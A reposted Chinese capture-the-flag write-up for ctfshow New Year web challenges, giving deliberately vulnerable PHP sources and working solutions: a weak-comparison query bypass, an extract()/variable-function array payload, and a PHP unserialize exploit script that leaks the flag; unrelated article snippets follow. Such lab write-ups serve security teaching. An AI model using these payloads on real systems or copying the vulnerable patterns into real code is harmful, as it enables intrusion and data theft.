ctfshow 年CTF web

除夕

Notice: Undefined index: year in /var/www/html/index.php on line 16
<?phpinclude "flag.php";$year = $_GET['year'];if($year==2022 && $year+1!==2023){echo $flag;
}else{highlight_file(__FILE__);
} 

弱比较绕过很简单,连函数都没有直接秒了

/index.php?year=2022.0

初三

<?phperror_reporting(0);
extract($_GET);
include "flag.php";
highlight_file(__FILE__);$_=function($__,$___){return $__==$___?$___:$__;
};
$$__($_($_GET{$___
}[$____]{$_____
}(),$flag));

这段代码很S,我只能说

$_=function($__,$___){return $__==$___?$___:$__;
};
传参$__$___如果二者相等则返回$___不然返回$__

上面的格式写出来很难看我们把他放在一起

$$__($_($_GET{$___}[$____]{$_____}(),$flag));
这样子就好看了,函数$__传参两个一个是$_GET{$___}[$____]{$_____}(),一个是flag
然后在php特性中[$a]{$a}是等效的
我们只要$_GET[$___][$____][$_____]和flag相等就可以
但是外面这个$$__我们还没说是啥这个是可控的我们可以让他为一个打印的函数就可以把返回的flag打印出来
由于弱比较所以我们就可以数组绕过

然后呢这里我问了几个师傅都是说的是二维数组,由a来当数组名这么来理解然后

phpinfo会等于$flag
绕过弱比较
?__=x&x=var_dump&___=a&____=b&_____=c&a[b][c]=phpinfo

初六

<?phpinclude "flag.php";class happy2year{private $secret;private $key;function __wakeup(){$this->secret="";}function __call($method,$argv){return call_user_func($this->key, array($method,$argv));}function getSecret($key){$key=$key?$key:$this->key;  //如果存在key那么就为原值不然把$this->key赋值给keyreturn $this->createSecret($key);    }function createSecret($key){return base64_encode($this->key.$this->secret);}function __get($arg){global $flag;$arg="get".$arg;$this->$arg = $flag;return $this->secret;}function __set($arg,$argv){$this->secret=base64_encode($arg.$argv);}function __invoke(){return $this->$secret;}function __toString(){return base64_encode($this->secret().$this->secret);}function __destruct(){$this->secret = "";}}highlight_file(__FILE__);
error_reporting(0);
$data=$_POST['data'];
$key = $_POST['key'];
$obj = unserialize($data);
if($obj){$secret = $obj->getSecret($key);print("你提交的key是".$key."\n生成的secret是".$secret);
} 

这次是真学到了,之前我只知道回调函数的利用但是不知道原理

function __call($method,$argv){return call_user_func($this->key, array($method,$argv));}
当调用不存在的方法时就会回调使得key可控
这里有一个重点就是$this$this在__construct中是被新创建的下面的EXP中也没有为其赋值,所以他代表的就是对象实例但是并没有具体的值
而另一种$this就是来引用
类似:$this->key="baozongwi"来赋值

审计版

<?phpinclude "flag.php";class happy2year{private $secret;private $key;function __wakeup(){$this->secret="";   //让secret为空}function __call($method,$argv){return call_user_func($this->key, array($method,$argv));  //回调可控使得我命令key为$this}function getSecret($key){$key=$key?$key:$this->key;  //如果存在key那么就为原值不然把$this->key赋值给keyreturn $this->createSecret($key);    }function createSecret($key){return base64_encode($this->key.$this->secret);  //由于secret为空所以返回的是$this 的base64值}function __get($arg){global $flag;       //全局变量   $flag$arg="get".$arg;     $this->$arg = $flag;       //之前不是说到$this 没有具体的值嘛,这里有了把flag赋值给$argreturn $this->secret;                }function __set($arg,$argv){$this->secret=base64_encode($arg.$argv);   //这里再进行一次编码}function __invoke(){return $this->$secret;}function __toString(){return base64_encode($this->secret().$this->secret);    //再次编码所以最后得到的flag只需要三次解码而不是四次}function __destruct(){$this->secret = "";  //清空}}

EXP

<?php
class happy2year{private $secret;private $key;function __construct(){$this->key=$this;}
}
echo urlencode(serialize(new happy2year()));
?>

然后就会得到经过base64加密的flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/22437.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

代码随想录算法训练营Day59 | 503.下一个更大元素II 42. 接雨水

代码随想录算法训练营Day59 | 503.下一个更大元素II 42. 接雨水 LeetCode 503.下一个更大元素II 题目链接&#xff1a;LeetCode 503.下一个更大元素II 思路&#xff1a; class Solution { public:vector<int> nextGreaterElements(vector<int>& nums) {// …

【数据分享】中国民政统计年鉴(1949-2022)

大家好&#xff01;今天我要向大家介绍一份重要的中国民政统计数据资源——《中国民政统计年鉴》。这份年鉴涵盖了从1949年到2022年中国民政统计全面数据&#xff0c;并提供限时免费下载。&#xff08;无需分享朋友圈即可获取&#xff09; 数据介绍 从1949年到2022年&#xf…

程序员的职业素养

在当今这个快速发展的技术世界中&#xff0c;程序员的职业素养已经成为了一个热门话题。随着技术的不断进步&#xff0c;程序员不仅需要掌握强大的技术能力&#xff0c;更需要具备一系列的职业素养来确保他们能够在职业生涯中取得成功。 《程序员的职业素养》一书由著名的软件工…

云原生架构案例分析_4.某电商业务云原生改造

名称解释&#xff1a; AHAS&#xff1a;应用高可用服务&#xff08;Application High Availability Service&#xff09;是一款专注于提高应用高可用能力的SaaS产品&#xff0c;主要包含多活容灾、故障演练和流量防护三个独立的功能模块。其中流量防护已迁移至微服务治理服务MS…

Java - Path接口和Files工具类

在Java中&#xff0c;Path接口和Files工具类是Java 7中引入的java.nio.file包的一部分&#xff0c;用于文件和文件系统的操作。这些API提供了比传统的java.io包更为强大和灵活的文件处理功能。 Path接口 Path接口表示文件系统中的路径&#xff0c;它可以是文件名或目录名。Pa…

再度“冲三”失利的泸州老窖,还能拿出什么“杀手锏”?

正值“618”&#xff0c;白酒行业也迎来了重要创收时刻。 据悉&#xff0c;天猫“618购物节”开卖首日&#xff0c;酒水直播销售额增长超1300%&#xff0c;拉动白酒行业增长147%。 这一增长背后&#xff0c;赛道的火药味也愈发浓厚&#xff0c;今年618大促中&#xff0c;五粮…

第十周:目标计划管理

1. 企业的目的 企业不同时期的目标是不一样的&#xff0c;第一阶段是保证存活&#xff1b;第二阶段是为了发展&#xff0c;加强公司业绩&#xff0c;达到预期的盈利&#xff1b;第三阶段是在发展壮大之后&#xff0c;有更多精力投入公司健康运转的事情&#xff0c;保证长久的生…

Flutter 中的 DefaultTextStyle 小部件:全面指南

Flutter 中的 DefaultTextStyle 小部件&#xff1a;全面指南 Flutter 是一个由 Google 开发的跨平台 UI 框架&#xff0c;它提供了丰富的组件来帮助开发者构建高性能、美观的应用。在 Flutter 的布局体系中&#xff0c;DefaultTextStyle 是一个重要的组件&#xff0c;它允许开…

【电路笔记】-Sallen-Key滤波器

Sallen-Key滤波器 Sallen-Key 滤波器拓扑用作实现高阶有源滤波器的构建块。 1、概述 Sallen-Key 滤波器设计是一种二阶有源滤波器拓扑,我们可以将其用作实现高阶滤波器电路的基本构建块,例如低通 (LPF)、高通 (HPF) 和带通 ( BPF)滤波器电路。 正如我们在本滤波器部分中…

<读评论……?>

为纪念今天数学比赛AK 回复一下比较常见的问题&#xff01; Q1:平常写代码时使用万能头文件好还是一个一个慢慢写好&#xff1f; A:我其实个人认为万能头好&#xff0c;这样比较省时 Q2:有很多书上写int main&#xff08;&#xff09;可以去掉int&#xff0c; 这是真的吗&#…

【匹配线段问题】

问题&#xff1a; 如下图所示。图中有两行正整数&#xff0c;每行中有若干个正整数。如果第一行的某个数r与第二行的某个数相同&#xff0c;这样就可以在这两个正整数之间划一条线&#xff0c;并称之为r-匹配线段。下图中存在3-匹配线段和2-匹配线段。 请编写完整程序&#xf…

【C语言】详解函数(庖丁解牛版)

文章目录 1. 前言2. 函数的概念3.库函数3.1 标准库和头文件3.2 库函数的使用3.2.1 头文件的包含3.2.2 实践 4. 自定义函数4.1 自定义函数的语法形式4.2 函数的举例 5. 形参和实参5.1 实参5.2 形参5.3 实参和形参的关系 6. return 语句6. 总结 1. 前言 一讲到函数这块&#xff…

Flutter 中的 CupertinoUserInterfaceLevel 小部件:全面指南

Flutter 中的 CupertinoUserInterfaceLevel 小部件&#xff1a;全面指南 Flutter 是一个功能强大的 UI 框架&#xff0c;由 Google 开发&#xff0c;允许开发者使用 Dart 语言构建跨平台的移动、Web 和桌面应用。在 Flutter 的 Cupertino&#xff08;iOS 风格&#xff09;组件…

数字塔问题

#include<iostream> using namespace std; //从下向上得到最优值 void dtower(int a[][100],int s[][100],int n) {for(int in; i>1; i--){for(int j1; j<i; j){if(in)s[i][j]a[i][j];else{int ts[i1][j];if(t<s[i1][j1])ts[i1][j1];s[i][j]a[i][j]t;}}} } void…

物理机装入Kali避坑指南

前言 只对容易出错的地方做详细说明&#xff0c;目的在物理机上配置kali 配置网络 eth0: Realtek Semiconductor Co., Ltd. RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller 这是一个有线网络接口&#xff0c;通过以太网电缆连接到网络。wlan0: Intel Corporatio…

架构每日一学 15:想要提升协作效率,必须先统一语义

谭sir与二仙桥大爷的经典对话&#xff1a; 谭sir&#xff1a;你该走哪&#xff1f;&#xff08;非机动车能走机动车道吗&#xff1f;&#xff09; 大爷&#xff1a;走二仙桥去成华大道&#xff08;因为我要去成华大道&#xff0c;当然要走二仙桥&#xff09; 谭sir&#xff1a;…

Redis的数据结构以及对应的使用场景

Redis支持的数据结构包括字符串(String)、列表(List)、哈希(Hash)、集合(Set)、有序集合(Sorted Set)等。这些数据结构在应用开发中扮演着重要的角色&#xff0c;它们各自适用于不同的使用场景和需求。以下是对Redis各数据结构的详细分析及它们的使用场景&#xff1a; 字符串(S…

前端地图中,已知一个点位,获取相同经度或者纬度下的,某个距离的另一个点位

效果图说明&#xff1a;我在圆的中心点位&#xff0c;找到他某个直线距离的另个一点&#xff0c;标注两者之间的距离。如图所示是25000米。 沿纬度方向移动 在相同经度下&#xff0c;计算沿纬度方向移动1000米的新点位&#xff1a; function calculateLatitudePoint(lat, ln…

10-Django项目--Ajax请求

目录 Ajax请求 简单示范 html 数据添加 py文件 html文件 demo_list.html Ajax_data.py 图例 Ajax请求 简单示范 html <input type"button" id"button-one" class"btn btn-success" value"点我"> ​ ​ <script>/…

如何找出你的Windows 10的内部版本和版本号?这里提供两种方法

你过去可能没有真正考虑过Windows内部版本号,除非这是你工作的一部分。以下是如何了解你运行的Windows 10的内部版本、版本和版本号。 内部版本意味着什么 Windows一直使用内部版本。它们代表着对Windows的重大更新。传统上,大多数人都是根据他们使用的主要命名版本(Windo…